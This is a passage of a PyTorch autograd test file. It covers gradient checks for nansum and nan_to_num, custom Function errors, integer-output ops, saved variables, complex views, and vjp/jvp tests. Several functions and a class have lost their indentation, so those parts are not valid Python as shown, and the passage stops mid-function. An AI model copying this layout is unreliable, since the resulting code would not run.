    self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))

    # Same check with a Python scalar base (exercises a different overload).
    s = 0
    b = torch.tensor([-1., 0., 1.], requires_grad=True)
    c = torch.sum(s**b)
    c.backward()
    self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
    """The grad dtype of sum(dtype=...) must match the input dtype, not the output's."""
    src = torch.randn(2, 2, 2, 2)
    with torch.no_grad():
        src[src < 0.2] = float('nan')

    def check(inp, inp_dtype, out_dtype):
        with torch.no_grad():
            casted = inp.to(inp_dtype)
            casted.requires_grad = True
        total = torch.sum(casted, dtype=out_dtype)
        total.backward()
        self.assertEqual(casted.dtype, casted.grad.dtype)

    # Up-cast and down-cast directions.
    check(src, torch.float, torch.double)
    check(src, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
    """Custom Functions missing forward or backward raise informative errors."""
    class BadFw(Function):
        @staticmethod
        def backward(ctx, foo):
            return foo

    class BadBw(Function):
        @staticmethod
        def forward(ctx, foo):
            return foo.clone()

    inp = torch.rand(1, requires_grad=True)
    # Missing forward fails immediately at apply() ...
    with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
        BadFw.apply(inp)

    # ... while missing backward only fails when gradients are requested.
    with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
        BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
    """Inplace ops on tensors created *inside* forward keep the custom grad_fn."""
    class MyFn(torch.autograd.Function):
        @staticmethod
        def forward(ctx, inp, inplace):
            view = inp.clone()[:3]
            if inplace:
                view += 2
            return view

        @staticmethod
        def backward(ctx, grad):
            return grad, None

    base = torch.rand(10, requires_grad=True)

    foo = MyFn.apply(base, False)
    self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")

    foo = MyFn.apply(base, True)
    self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
    """Ops with integer (or otherwise non-differentiable) outputs must not require grad."""
    inp = torch.rand(4, requires_grad=True)

    out = inp.argmax()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    out = inp.argmin()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    out = inp.argsort()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    val = torch.rand((), requires_grad=True)

    out = torch.searchsorted(inp, val)
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
    vals = torch.rand(5, 5, requires_grad=True)
    out = torch.bucketize(vals, bins)
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    val = torch.empty(5).requires_grad_()
    out = val.count_nonzero()
    self.assertFalse(out.requires_grad)

    def assert_only_first_requires_grad(res):
        # For unique-style ops only the values output is differentiable;
        # inverse/count outputs are integer and must not require grad.
        if not isinstance(res, tuple):
            res = (res,)
        self.assertTrue(res[0].requires_grad)
        for out in res[1:]:
            if out is not None:
                self.assertFalse(out.requires_grad)

    for sort in [True, False]:
        for return_inverse in [True, False]:
            for return_counts in [True, False]:
                res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                   return_counts=return_counts)
                assert_only_first_requires_grad(res)

                res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                   return_counts=return_counts, dim=0)
                assert_only_first_requires_grad(res)

                res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                               return_counts=return_counts)
                assert_only_first_requires_grad(res)

                res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                               return_counts=return_counts, dim=0)
                assert_only_first_requires_grad(res)

                # Here we test the internal functions to make sure all of them are
                # covered on top of the public API
                res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
                assert_only_first_requires_grad(res)

                # This looks public but is actually manually deleted from the
                # torch namespace in torch/functional.py
                res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
                                           return_counts=return_counts)
                assert_only_first_requires_grad(res)

                # We don't test `unique_dim_consecutive` here.
                # It looks public but the python binding is actually manually disabled in
                # tools/autograd/gen_python_functions.py

                res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
                                     return_counts=return_counts)
                assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
    """A reference cycle through ctx (saved tensor + ctx.__dict__) must be collectable."""
    class MyFn(Function):
        @staticmethod
        def forward(ctx, x, metadata):
            x = x.clone()
            ctx.meta = metadata
            ctx.save_for_backward(x)
            return x

        @staticmethod
        def backward(ctx, gO):
            x, = ctx.saved_tensors
            self.assertEqual(x, 3.14)
            self.assertEqual(ctx.meta["foo"], 3.14)
            return gO * x, None

    def get_refs(with_backward):
        a = torch.tensor(3.14, requires_grad=True)

        metadata = {}
        out = MyFn.apply(a, metadata)
        # Close the cycle: ctx.meta["foo"] -> out -> grad_fn -> ctx.
        metadata["foo"] = out

        if with_backward:
            out.sum().backward()
            self.assertEqual(a.grad, a)

        return torch._C._WeakTensorRef(out)

    # Without a gc pass the cycle keeps `out` alive; collect() must free it.
    with disable_gc():
        ref = get_refs(False)
        self.assertFalse(ref.expired())
    gc.collect()
    self.assertTrue(ref.expired())

    # The backward clears the saved_variables but not the __dict__
    with disable_gc():
        ref = get_refs(True)
        self.assertFalse(ref.expired())
    gc.collect()
    self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
    """Accumulating sparse + dense grads must not mutate the caller's grad tensors."""
    leaf = torch.rand(2, 2, requires_grad=True)

    # gather(..., sparse_grad=True) yields a sparse gradient,
    index = torch.tensor([[0, 0]], dtype=torch.long)
    sparse_out = leaf.gather(0, index, sparse_grad=True)
    # while clone passes its gradient through unchanged.
    dense_out = leaf.clone()

    g_dense_original = torch.rand_like(dense_out)
    g_dense = g_dense_original.clone()
    g_sparse = torch.rand_like(sparse_out)

    torch.autograd.backward((dense_out, sparse_out), (g_dense, g_sparse))

    # The gradient we handed in must come back untouched.
    self.assertEqual(g_dense, g_dense_original)
def test_no_unnecessary_unwrapping(self):
    """Saved inputs are stored as the same object; saved outputs are re-wrapped."""
    a = torch.randn(5, requires_grad=True)
    a_orig = a.detach().clone()
    b = a * a
    c = a * b
    d = torch.exp(a)

    # a is leaf
    self.assertIs(b.grad_fn._saved_self, a)
    self.assertIs(b.grad_fn._saved_other, a)
    self.assertIs(c.grad_fn._saved_self, a)

    # b is not an output
    self.assertIs(c.grad_fn._saved_other, b)

    # d is an output
    self.assertEqual(d.grad_fn._saved_result, d)
    self.assertIsNot(d.grad_fn._saved_result, d)

    c.sum().backward()

    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        c.grad_fn._saved_self

    # a is left untouched
    self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
    """An unpacked saved variable shares its version counter with the original."""
    x = torch.rand(2, requires_grad=True)
    y = torch.exp(x)

    unpacked = y.grad_fn._saved_result
    self.assertEqual(y, unpacked)
    self.assertEqual(y._version, unpacked._version)

    with torch.no_grad():
        y += 1

    # The in-place bump must be visible through the unpacked saved variable.
    self.assertEqual(y, unpacked)
    self.assertEqual(y._version, unpacked._version)
def index_perm_variable(shape, max_indices):
    """Return a tensor of the given shape filled with distinct indices in [0, max_indices).

    ``shape`` may be an int (treated as a 1-D length) or a tuple.  The values
    are a random sample without replacement, so ``reduce(mul, shape)`` must
    not exceed ``max_indices``.
    """
    if not isinstance(shape, tuple):
        shape = (shape,)

    numel = reduce(mul, shape)
    return torch.randperm(max_indices).narrow(0, 0, numel).view(shape)
def bernoulli_scalar():
    """Return a 0-dim uint8 tensor sampled in place with bernoulli_()."""
    sample = torch.zeros((), dtype=torch.uint8)
    return sample.bernoulli_()
def gradgradcheck_method_precision_override(test_name):
    """Return looser gradgradcheck tolerances for known-imprecise tests.

    Returns a dict with 'atol'/'rtol' keys (scaled up for broadcasting
    variants, which accumulate error over more elements) or None when the
    default precision should be used.
    """
    # these are just empirical observations, we should improve
    known_overrides = {
        'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
        'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
        'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
    }
    base_name = test_name.split("_broadcast")[0]
    override = known_overrides.get(base_name)
    if not override:
        return override

    # NOTE(review): both scaled entries below derive from 'atol' — presumably
    # intentional (empirical), but confirm 'rtol' was not meant to scale the
    # base 'rtol' instead.
    if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
        # errors accumulated across 1 dimension
        override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
    elif 'broadcast_all' in test_name:
        # errors accumulated across multiple dimensions
        override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
    return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
                                 input_variables, run_gradgradcheck=True, check_batched_grad=True,
                                 check_forward_ad=False):
    """Run gradcheck then gradgradcheck on `apply_method`, honoring per-test
    gradgradcheck tolerance overrides keyed by `test_name`."""
    test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
                                   check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
    override = gradgradcheck_method_precision_override(test_name)
    if override is None:
        test_case.assertTrue(gradgradcheck(apply_method, input_variables,
                                           gen_non_contig_grad_outputs=True,
                                           check_batched_grad=check_batched_grad))
    else:
        # Known-noisy test: use its empirically chosen tolerances.
        test_case.assertTrue(gradgradcheck(apply_method, input_variables, None,
                                           atol=override['atol'], rtol=override['rtol'],
                                           gen_non_contig_grad_outputs=True,
                                           check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
                          f_args_variable, f_args_tensor, *, check_forward_ad=False):
    """Apply `apply_fn`, optionally run grad/gradgrad checks, then backprop once
    and sanity-check the first input's gradient type and size."""
    out = apply_fn(*f_args_variable)
    if run_grad_checks:
        run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
                                     out, f_args_variable, check_forward_ad=check_forward_ad)
    self_variable = f_args_variable[0]
    needs_backward = (isinstance(out, torch.Tensor) and out.requires_grad
                      and self_variable is not None)
    if needs_backward:
        out.backward(randn_like(out))
        test_case.assertEqualTypeString(self_variable, self_variable.grad)
        test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
    """Autograd behavior of the complex<->real view ops
    (torch.view_as_complex / torch.view_as_real)."""

    def test_view_func_for_complex_views(self):
        """Backward through chains of complex views must match the same
        computation done without the intermediate views."""
        # case 1: both parent and child have view_func
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)

        x0 = x.clone()
        x1 = torch.view_as_complex(x0)
        x2 = torch.view_as_real(x1)
        x2.mul_(2)  # in-place through the view chain
        x2.sum().backward()

        y0 = y.clone()
        y0.mul_(2)
        y0.sum().backward()

        self.assertEqual(x.grad, y.grad)

        # case 2: parent has view_func but child does not
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a):
            b = a.clone()
            b1 = torch.view_as_complex(b)
            b2 = b1.reshape(b1.numel())
            return b2

        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()

        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()

        self.assertEqual(x.grad, y.grad)

        # case 3: parent does not have a view_func but child does
        x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a, dim0_size=5):
            b = a.clone()
            b1 = b.reshape(dim0_size, 2)
            b2 = torch.view_as_real(b1)
            return b2

        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()

        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()

        self.assertEqual(x.grad, y.grad)

    def test_view_with_multi_output(self):
        """In-place modification of one result of a multi-output view (unbind)
        must raise, both with and without requires_grad on the base."""
        x = torch.randn(2, 2, 2, dtype=torch.double)

        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)

        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)

        x.requires_grad_(True)
        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)

        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)

    # NOTE(review): this method has no "test_" prefix, so the unittest runner
    # never executes it — confirm whether that is intentional.
    def as_identity(self):
        # view_as_real and view_as_complex behavior should be like an identity
        def func(z):
            z_ = torch.view_as_complex(z)
            z_select = torch.select(z_, z_.dim() - 1, 0)
            z_select_real = torch.view_as_real(z_select)
            return z_select_real.sum()

        z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
        gradcheck(func, [z])
        func(z).backward()

        z1 = z.clone().detach().requires_grad_(True)
        torch.select(z1, z1.dim() - 2, 0).sum().backward()

        self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
    """Assert that `res` mirrors `base`: both Tensors of equal size, or both
    tuples of Tensors with matching lengths and per-element sizes."""
    if isinstance(base, torch.Tensor):
        self.assertTrue(isinstance(res, torch.Tensor))
        self.assertEqual(base.size(), res.size())
        return
    if isinstance(base, tuple):
        self.assertTrue(isinstance(res, tuple))
        self.assertEqual(len(base), len(res))
        for el_base, el_res in zip(base, res):
            self.assertTrue(isinstance(el_base, torch.Tensor))
            self.assertTrue(isinstance(el_res, torch.Tensor))
            self.assertEqual(el_base.size(), el_res.size())
        return
    # Wrong base
    raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
                       " the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
    """Assert that `res` has the interleaved (jacobian-like) structure of
    (base1, base2).

    base1 and base2 can be Tensors or tuples of Tensors.
    If they are tuples, res should be a tuple as well.
    The indexing works as follows for base1, base2 being
    - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
    - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
    - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
    - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
    """
    if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
        # Tensor/Tensor: a single Tensor whose size is the concatenation.
        self.assertTrue(isinstance(res, torch.Tensor))
        self.assertEqual(res.size(), base1.size() + base2.size())
    elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
        # tuple/Tensor: one Tensor per element of base1.
        self.assertTrue(isinstance(res, tuple))
        self.assertEqual(len(res), len(base1))
        for el_res, el_base1 in zip(res, base1):
            self.assertTrue(isinstance(el_res, torch.Tensor))
            self.assertTrue(isinstance(el_base1, torch.Tensor))
            self.assertEqual(el_res.size(), el_base1.size() + base2.size())
    elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
        # Tensor/tuple: one Tensor per element of base2.
        self.assertTrue(isinstance(res, tuple))
        self.assertEqual(len(res), len(base2))
        for el_res, el_base2 in zip(res, base2):
            self.assertTrue(isinstance(el_res, torch.Tensor))
            self.assertTrue(isinstance(el_base2, torch.Tensor))
            self.assertEqual(el_res.size(), base1.size() + el_base2.size())
    elif isinstance(base1, tuple) and isinstance(base2, tuple):
        # tuple/tuple: a tuple (over base1) of tuples (over base2) of Tensors.
        self.assertTrue(isinstance(res, tuple))
        self.assertEqual(len(res), len(base1))
        for el_res, el_base1 in zip(res, base1):
            self.assertTrue(isinstance(el_res, tuple))
            # NOTE(review): this checks len(res) against len(base2);
            # len(el_res) may have been intended — confirm.
            self.assertEqual(len(res), len(base2))
            for el_el_res, el_base2 in zip(el_res, base2):
                self.assertTrue(isinstance(el_el_res, torch.Tensor))
                self.assertTrue(isinstance(el_base2, torch.Tensor))
                self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
    else:
        # Wrong bases
        raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
                           " the right structure.")
def test_vjp_err_check(self):
    """vjp must validate its inputs, outputs and the shape of v."""
    def foo(t):
        return 3 * t.narrow(0, 0, 3)

    def bar(t):
        return 3 * t.narrow(0, 0, 3), "bar"

    x = torch.rand(4)
    vec = torch.ones(3)
    with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
        autogradF.vjp(foo, (x, 2), vec)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
        autogradF.vjp(bar, x, vec)
    with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
        autogradF.vjp(foo, x)
    with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
        autogradF.vjp(foo, x, (torch.ones_like(x), torch.ones_like(x)))
    with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
        autogradF.vjp(foo, x, vec[:2])
    # A well-formed call succeeds and the grads mirror the input structure.
    result = autogradF.vjp(foo, x, vec)[1]
    self._assert_same_struct(result, x)
def test_vjp_err_check_strict(self):
    """strict=True must reject outputs that are detached, disconnected from
    the input, or whose jacobian is input-independent; strict=False returns
    zeros (or v itself, for the identity) instead."""
    def foo(a):
        return a.detach()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.vjp(foo, inp, v, strict=True)
    res = autogradF.vjp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    # Non-strict mode yields all-zero gradients for the detached output.
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.vjp(bar, inp, v, strict=True)
    res = autogradF.vjp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()

    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
    res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
    self._assert_same_struct(res[1], inp)
    # Identity function: the vjp is exactly v.
    self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
    """no_grad does not stop vjp from computing; create_graph=True still records."""
    def reducer(t):
        return t.sum(dim=1)

    xs = torch.rand(4, 4)
    vec = torch.ones(4)
    with torch.no_grad():
        out, grad = autogradF.vjp(reducer, xs, vec)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(grad.grad_fn)
    self.assertNotEqual(grad, torch.zeros(4, 4))

    xs.requires_grad_()
    vec.requires_grad_()
    with torch.no_grad():
        out, grad = autogradF.vjp(reducer, xs, vec, create_graph=True)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(grad.grad_fn)
    self.assertNotEqual(grad, torch.zeros(4, 4))
def test_vjp_output(self):
    """vjp's grads mirror the input structure; no graph is recorded by default."""
    def reducer(t):
        return t.sum(dim=1)

    xs = torch.rand(4, 4)
    vec = torch.ones(4)
    out, grad = autogradF.vjp(reducer, xs, vec)
    self._assert_same_struct(grad, xs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(grad.grad_fn)

    def adder(a, b):
        return 2 * a + 3 * b

    pair = (torch.rand(2), torch.rand(2))
    vec = torch.ones(2)
    out, vjp_val = autogradF.vjp(adder, pair, vec)
    self._assert_same_struct(vjp_val, pair)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vjp_val[0].grad_fn)
    self.assertIsNone(vjp_val[1].grad_fn)

    def adder2(a, b):
        return 2 * a + 3 * b, a + b

    pair = (torch.rand(2), torch.rand(2))
    vecs = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
    out, vjp_val = autogradF.vjp(adder2, pair, vecs)
    self._assert_same_struct(vjp_val, pair)
    self.assertIsNone(out[0].grad_fn)
    self.assertIsNone(out[1].grad_fn)
    self.assertIsNone(vjp_val[0].grad_fn)
    self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
    """vjp handles scalar outputs (v then optional) and scalar inputs."""
    def reducer(t):
        return t.sum()

    xs = torch.rand(4, 4)
    vec = torch.ones([])
    # With a scalar output, v may be given explicitly or omitted.
    for args in ((xs, vec), (xs,)):
        result = autogradF.vjp(reducer, *args)
        self._assert_same_struct(result[0], vec)
        self._assert_same_struct(result[1], xs)

    def expander(t):
        return t.unsqueeze(0).repeat(4)

    scalar = torch.rand([])
    vec = torch.ones(4)
    result = autogradF.vjp(expander, scalar, vec)
    self._assert_same_struct(result[0], vec)
    self._assert_same_struct(result[1], scalar)
def test_vjp_create_graph(self):
    """vjp with create_graph=True must itself be differentiable.

    Checks that the returned output/grads carry a grad_fn and that first- and
    second-order gradients through autogradF.vjp pass gradcheck/gradgradcheck.
    """
    def reducer(x):
        return x.sum(dim=1)

    inputs = torch.rand(2, 2, dtype=torch.double)
    v = torch.ones(2, dtype=torch.double)
    inputs.requires_grad_()
    v.requires_grad_()
    res = autogradF.vjp(reducer, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    # BUG FIX: these lambdas previously closed over `inputs` instead of using
    # their `inp` parameter, so the function under check did not formally
    # depend on the first argument gradcheck perturbs. Use the lambda
    # parameters (matches test_jvp_create_graph below).
    gradcheck(lambda inp, v: autogradF.vjp(reducer, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inp, v, create_graph=True), (inputs, v))

    def adder(x, y):
        return 2 * x + 3 * y, x * y

    inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
              torch.rand(2, dtype=torch.double, requires_grad=True))
    v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
         torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))

    gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)

        return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
    """jvp must validate its inputs, outputs and the shape of v."""
    def foo(t):
        return 3 * t.narrow(0, 0, 3)

    def bar(t):
        return 3 * t.narrow(0, 0, 3), "bar"

    x = torch.rand(4)
    vec = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
        autogradF.jvp(foo, (x, 2), vec)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
        autogradF.jvp(bar, x, vec)
    with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
        autogradF.jvp(foo, x)
    with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
        autogradF.jvp(foo, x, (vec, vec))
    with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
        autogradF.jvp(foo, x, vec[:2])
    # A well-formed call succeeds; the jvp mirrors the output structure.
    result = autogradF.jvp(foo, x, vec)[1]
    self._assert_same_struct(result, foo(x))
def test_jvp_err_check_strict(self):
    """strict=True must reject outputs that are detached, disconnected from
    the input, or whose jacobian is input-independent; strict=False returns
    zeros (or v itself, for the identity) instead."""
    def foo(a):
        return a.detach()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.jvp(foo, inp, v, strict=True)
    res = autogradF.jvp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], res[0])
    # Non-strict mode yields an all-zero jvp for the detached output.
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.jvp(bar, inp, v, strict=True)
    res = autogradF.jvp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], res[0])
    self.assertEqual(res[1].abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()

    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
    res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
    self._assert_same_struct(res[1], inp)
    # Identity function: the jvp is exactly v.
    self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
    """no_grad does not stop jvp from computing; create_graph=True still records."""
    def reducer(t):
        return t.sum(dim=1)

    xs = torch.rand(4, 4)
    vec = torch.ones(4, 4)
    with torch.no_grad():
        out, jvp_val = autogradF.jvp(reducer, xs, vec)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(jvp_val.grad_fn)
    self.assertNotEqual(jvp_val, torch.zeros(4, 4))

    xs.requires_grad_()
    vec.requires_grad_()
    with torch.no_grad():
        out, jvp_val = autogradF.jvp(reducer, xs, vec, create_graph=True)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(jvp_val.grad_fn)
    self.assertNotEqual(jvp_val, torch.zeros(4, 4))
def test_jvp_output(self):
    """jvp's second result mirrors the function output; no graph by default."""
    def reducer(t):
        return t.sum(dim=1)

    xs = torch.rand(4, 4)
    vec = torch.ones(4, 4)
    out, jvp_val = autogradF.jvp(reducer, xs, vec)
    self._assert_same_struct(jvp_val, out)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(jvp_val.grad_fn)

    def adder(a, b):
        return 2 * a + 3 * b

    pair = (torch.rand(2), torch.rand(2))
    vecs = (torch.ones(2), torch.ones(2))
    out, jvp_val = autogradF.jvp(adder, pair, vecs)
    self._assert_same_struct(jvp_val, out)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(jvp_val[0].grad_fn)
    self.assertIsNone(jvp_val[1].grad_fn)

    def adder2(a, b):
        return 2 * a + 3 * b, a + b

    pair = (torch.rand(2), torch.rand(2))
    vecs = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
    out, jvp_val = autogradF.jvp(adder2, pair, vecs)
    self._assert_same_struct(jvp_val, out)
    self.assertIsNone(out[0].grad_fn)
    self.assertIsNone(out[1].grad_fn)
    self.assertIsNone(jvp_val[0].grad_fn)
    self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
    """jvp handles scalar outputs and scalar inputs (v optional for scalar input)."""
    def reducer(t):
        return t.sum()

    xs = torch.rand(4, 4)
    vec = torch.ones(4, 4)
    result = autogradF.jvp(reducer, xs, vec)
    self._assert_same_struct(result[0], torch.zeros([]))
    self._assert_same_struct(result[1], result[0])

    def expander(t):
        return t.unsqueeze(0).repeat(4)

    scalar = torch.rand([])
    vec = torch.ones([])
    # With a scalar input, v may be given explicitly or omitted.
    for args in ((scalar, vec), (scalar,)):
        result = autogradF.jvp(expander, *args)
        self._assert_same_struct(result[0], torch.zeros(4))
        self._assert_same_struct(result[1], result[0])
def test_jvp_create_graph(self):
    """jvp with create_graph=True must itself be differentiable: results carry
    a grad_fn and first/second order gradients pass gradcheck/gradgradcheck."""
    def reducer(x):
